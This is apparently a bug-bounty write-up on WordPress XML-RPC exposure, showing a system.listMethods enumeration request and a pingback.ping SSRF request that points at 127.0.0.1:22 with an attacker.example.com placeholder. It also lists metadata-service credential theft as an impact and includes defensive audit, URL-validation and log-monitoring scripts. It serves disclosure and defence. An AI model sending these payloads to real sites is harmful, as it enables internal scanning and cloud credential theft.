While testing for common vulnerabilities in WordPress installations, I found an exposed XML-RPC interface that enabled me to perform method enumeration and server-side request forgery (SSRF), resulting in a $$$ bounty. In this blog, I'll explain how this happened and why this issue is more dangerous than it seems.

🧠 What is XML-RPC in WordPress?

XML-RPC is a feature that allows remote access to WordPress. It's commonly used by mobile apps and third-party tools like Jetpack or blogging clients. The endpoint is typically located at:

https://example.com/xmlrpc.php

Unfortunately, many site owners leave this feature enabled even when it's not required, exposing powerful internal methods to unauthenticated users.

🔎 Vulnerability Summary

The following issues were observed on the WordPress site hosted at https://example.com:

  • Unauthenticated access to system.listMethods, revealing all supported XML-RPC functions.
  • SSRF via pingback.ping, allowing the server to make arbitrary HTTP requests.

⚠️ Affected Endpoint

https://example.com/xmlrpc.php

📌 Vulnerability 1: Method Enumeration via system.listMethods

I first tested whether the XML-RPC API was publicly accessible. By sending a simple XML payload with the system.listMethods call, I was able to list every method the server supported, including plugin-defined ones.

🔧 Request:

POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Type: text/xml
<methodCall>
  <methodName>system.listMethods</methodName>
</methodCall>

📥 Response:

<methodResponse>
  <params>
    <param>
      <value>
        <array>
          <data>
            <value><string>system.listMethods</string></value>
            <value><string>system.multicall</string></value>
            <value><string>pingback.ping</string></value>
            <value><string>wpcom.mobile_push_win_phone_get_last_notification</string></value>
            ...

This response showed that several methods were enabled, including pingback.ping, which is known for SSRF potential.
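As an added example (not code from the original post), here is a small audit script for checking your own sites: it builds the system.listMethods call shown above, parses the methodResponse, and flags the two methods the post singles out. The function names are this example's own, and SAMPLE_RESPONSE is constructed from the method names quoted in the response above.

```python
"""Audit an XML-RPC system.listMethods reply and flag the methods the post
singles out. Added example, not code from the original post; the function
names are this example's own, and SAMPLE_RESPONSE is constructed from the
method names quoted above."""
import urllib.request
import xml.etree.ElementTree as ET
from typing import Dict, List

# Methods worth flagging when they are reachable without authentication.
RISKY_METHODS = {
    "pingback.ping": "lets the server fetch an arbitrary URL (SSRF)",
    "system.multicall": "batches many calls into one HTTP request",
}


def build_list_methods_call() -> bytes:
    """Body of the system.listMethods request shown in the post."""
    root = ET.Element("methodCall")
    ET.SubElement(root, "methodName").text = "system.listMethods"
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def parse_method_list(body: str) -> List[str]:
    """Extract the method names from a system.listMethods methodResponse.

    Raises ValueError when the reply is an XML-RPC fault or not a methodResponse.
    """
    root = ET.fromstring(body)
    if root.tag != "methodResponse":
        raise ValueError(f"unexpected root element {root.tag!r}")
    fault = root.find("fault")
    if fault is not None:
        msg = fault.findtext(".//member[name='faultString']/value/string", "unknown fault")
        raise ValueError(f"server returned a fault: {msg}")
    return [
        el.text
        for el in root.findall("./params/param/value/array/data/value/string")
        if el.text
    ]


def audit_methods(methods: List[str]) -> Dict[str, str]:
    """Return the enabled methods that deserve attention, with the reason."""
    return {m: RISKY_METHODS[m] for m in methods if m in RISKY_METHODS}


def fetch_method_list(endpoint: str, timeout: float = 10.0) -> List[str]:
    """POST system.listMethods to an xmlrpc.php endpoint you administer and parse the reply."""
    req = urllib.request.Request(
        endpoint,
        data=build_list_methods_call(),
        headers={"Content-Type": "text/xml"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_method_list(resp.read().decode("utf-8", "replace"))


# Constructed reply, using the method names quoted in the post's response.
SAMPLE_RESPONSE = """<?xml version="1.0"?>
<methodResponse>
  <params>
    <param>
      <value>
        <array>
          <data>
            <value><string>system.listMethods</string></value>
            <value><string>system.multicall</string></value>
            <value><string>pingback.ping</string></value>
            <value><string>wpcom.mobile_push_win_phone_get_last_notification</string></value>
          </data>
        </array>
      </value>
    </param>
  </params>
</methodResponse>
"""

if __name__ == "__main__":
    methods = parse_method_list(SAMPLE_RESPONSE)
    print(f"{len(methods)} methods enabled")
    for name, reason in audit_methods(methods).items():
        print(f"  flag {name}: {reason}")
```

Run it against SAMPLE_RESPONSE offline, or point fetch_method_list at the xmlrpc.php of a site you administer; an empty result from audit_methods after applying the recommendations below is the quickest way to confirm the fix took effect.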

🚨 Vulnerability 2: SSRF via pingback.ping

The pingback.ping method is meant to notify a site that it's been linked to. However, it can be abused to make the WordPress server initiate HTTP requests to arbitrary URLs, including internal IPs.

🧪 Exploit Request:

POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Type: text/xml
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://127.0.0.1:22/</string></value></param>
    <param><value><string>https://attacker.example.com/post</string></value></param>
  </params>
</methodCall>

🧯 Response:

<fault>
  <value>
    <struct>
      <member>
        <name>faultCode</name>
        <value><int>0</int></value>
      </member>
      <member>
        <name>faultString</name>
        <value><string>Invalid discovery target</string></value>
      </member>
    </struct>
  </value>
</fault>

Even though the request failed due to backlink validation, it confirmed that the WordPress server attempted a connection to 127.0.0.1:22, proving SSRF functionality.
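For the defensive side of this, here is an added example (not WordPress code) of the kind of check a pingback handler should run on the source URL before fetching it. It applies the policy WordPress enforces on the pingback source through wp_http_validate_url: http/https only, ports 80, 443 and 8080 only, and no loopback, private or link-local hosts. With it in place, the http://127.0.0.1:22/ source from the request above is refused before any socket is opened. The function names, the stub resolver and the addresses in it are this example's own.

```python
"""Validate a pingback source URL before the server fetches it.

Added example, not WordPress code. It applies the policy WordPress enforces on
the pingback source via wp_http_validate_url (http/https only, ports 80, 443
and 8080 only, no loopback, private or link-local hosts). Function names, the
stub resolver and its addresses are this example's own."""
import ipaddress
import socket
from typing import Callable, List, Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443, 8080}
Resolver = Callable[[str], List[str]]


def system_resolver(host: str) -> List[str]:
    """Resolve a hostname with the system resolver (IPv4 and IPv6)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def stub_resolver(host: str) -> List[str]:
    """Offline resolver for the sample: constructed answers, not real DNS."""
    table = {
        "example.com": ["93.184.216.34"],   # a public address for the sample
        "intranet.test": ["10.0.0.5"],      # public name, private answer
    }
    if host not in table:
        raise socket.gaierror(f"constructed NXDOMAIN for {host}")
    return table[host]


def is_internal_address(addr: str) -> bool:
    """Loopback, RFC 1918/ULA, link-local (169.254.169.254 included), multicast,
    reserved or unspecified addresses must never be fetched on a caller's behalf."""
    ip = ipaddress.ip_address(addr)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_pingback_source(url: str, resolve: Resolver = system_resolver) -> Optional[str]:
    """Return None when the URL may be fetched, otherwise the reason it is refused."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return f"scheme {scheme or '(none)'} not allowed"
    host = parts.hostname
    if not host:
        return "no host in URL"
    try:
        port = parts.port
    except ValueError:
        return "malformed port"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return f"port {port} not allowed"
    # A literal IP is checked directly; a hostname is resolved first so that a
    # public name pointing at a private address is caught as well.
    try:
        ipaddress.ip_address(host)
        addresses = [host]
    except ValueError:
        try:
            addresses = resolve(host)
        except OSError:
            return f"host {host} does not resolve"
    if not addresses:
        return f"host {host} does not resolve"
    for addr in addresses:
        if is_internal_address(addr):
            return f"host {host} points at internal address {addr}"
    return None


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:22/", "http://127.0.0.1/",
                      "http://169.254.169.254/latest/meta-data/",
                      "https://intranet.test/", "https://example.com/post"):
        verdict = validate_pingback_source(candidate, stub_resolver)
        print(f"{candidate}: {'ok' if verdict is None else verdict}")
```

Two caveats for anyone triaging a report like this one. First, a validator of this kind answers with a fault without ever connecting, so confirm an outbound request out-of-band (a listener you control, or the server's own connection logs) rather than inferring it from the fault string alone. Second, resolving at validation time and again at fetch time can give different answers (DNS rebinding), so the fetch layer should connect to the address that was validated, not re-resolve the name.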

🎯 Potential Impact

This vulnerability has wide-reaching consequences:

  • 🔍 Internal Port Scanning: Identify open services (e.g., Redis, SSH) on localhost or internal networks like 192.168.0.0/16.
  • 🌐 Metadata Service Access: Target http://169.254.169.254/ to extract cloud instance data (e.g., AWS EC2 credentials).
  • ⚙️ Chained Exploits: Combine SSRF with insecure plugins to achieve Remote Code Execution (RCE).

🛠 Recommendations

✅ Disable XML-RPC if unused:

Add this line to your functions.php:

// Only turns off the methods that require authentication; pingback.ping stays reachable.
add_filter('xmlrpc_enabled', '__return_false');

Or block it via .htaccess:

<Files xmlrpc.php>
  # Apache 2.2 syntax; on Apache 2.4 it needs mod_access_compat, otherwise use "Require all denied"
  Order Deny,Allow
  Deny from all
</Files>

🔒 If XML-RPC is needed:

  • Block dangerous methods like pingback.ping and system.multicall via a WAF or security plugin.
  • Restrict access to authenticated users where possible.
  • Monitor for repeated XML-RPC traffic in logs.
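To make the last recommendation concrete, here is an added example (not part of the original post) that scans an Apache/nginx combined-format access log and flags clients that POST to xmlrpc.php repeatedly within a short window. The sample lines, the threshold and the window are constructed for the example; tune them to your own traffic, since legitimate clients such as Jetpack also post there.

```python
"""Flag clients that hammer xmlrpc.php, from an Apache/nginx combined-format
access log. Added example for the "monitor for repeated XML-RPC traffic"
recommendation; not part of the original post. The sample lines, threshold
and window are constructed for the example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, Optional

# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return None for lines in another format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m["ip"],
        "time": datetime.strptime(m["time"], TIME_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def find_xmlrpc_bursts(lines: Iterable[str], threshold: int = 5,
                       window_seconds: int = 60) -> Dict[str, int]:
    """Return {client_ip: peak_count} for clients that POSTed to xmlrpc.php at
    least `threshold` times inside any interval of `window_seconds`."""
    window = timedelta(seconds=window_seconds)
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/xmlrpc.php"):
            posts[rec["ip"]].append(rec["time"])

    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start, peak = 0, 0
        # Sliding window over the sorted timestamps of this client's POSTs.
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


# Constructed sample: one client posts six times in under half a minute,
# another makes a single pingback-style post alongside normal browsing.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2024:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 413 "-" "python-requests/2.31"
198.51.100.4 - - [12/May/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2024:10:00:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 413 "-" "python-requests/2.31"
203.0.113.7 - - [12/May/2024:10:00:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 413 "-" "python-requests/2.31"
198.51.100.4 - - [12/May/2024:10:00:12 +0000] "POST /xmlrpc.php HTTP/1.1" 200 620 "-" "Jetpack"
203.0.113.7 - - [12/May/2024:10:00:14 +0000] "POST /xmlrpc.php HTTP/1.1" 200 413 "-" "python-requests/2.31"
203.0.113.7 - - [12/May/2024:10:00:20 +0000] "POST /xmlrpc.php HTTP/1.1" 200 413 "-" "python-requests/2.31"
203.0.113.7 - - [12/May/2024:10:00:27 +0000] "POST /xmlrpc.php HTTP/1.1" 200 413 "-" "python-requests/2.31"
"""

if __name__ == "__main__":
    for ip, count in find_xmlrpc_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {count} POSTs to xmlrpc.php within 60s")
```

Access logs do not carry request bodies, so this only sees volume; if the WAF or a security plugin logs the XML-RPC method name, a separate alert on any pingback.ping or system.multicall call is the more precise signal.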

πŸ† Reward

This bug was submitted through a responsible disclosure program and rewarded with $$$. Even though this was a fairly common misconfiguration, the presence of SSRF made it impactful.

✍️ Final Thoughts

WordPress sites often expose more than they should. Even basic methods like pingback.ping can open the door to serious internal attacks. Always scan for legacy APIs, especially if you're doing reconnaissance or pentesting.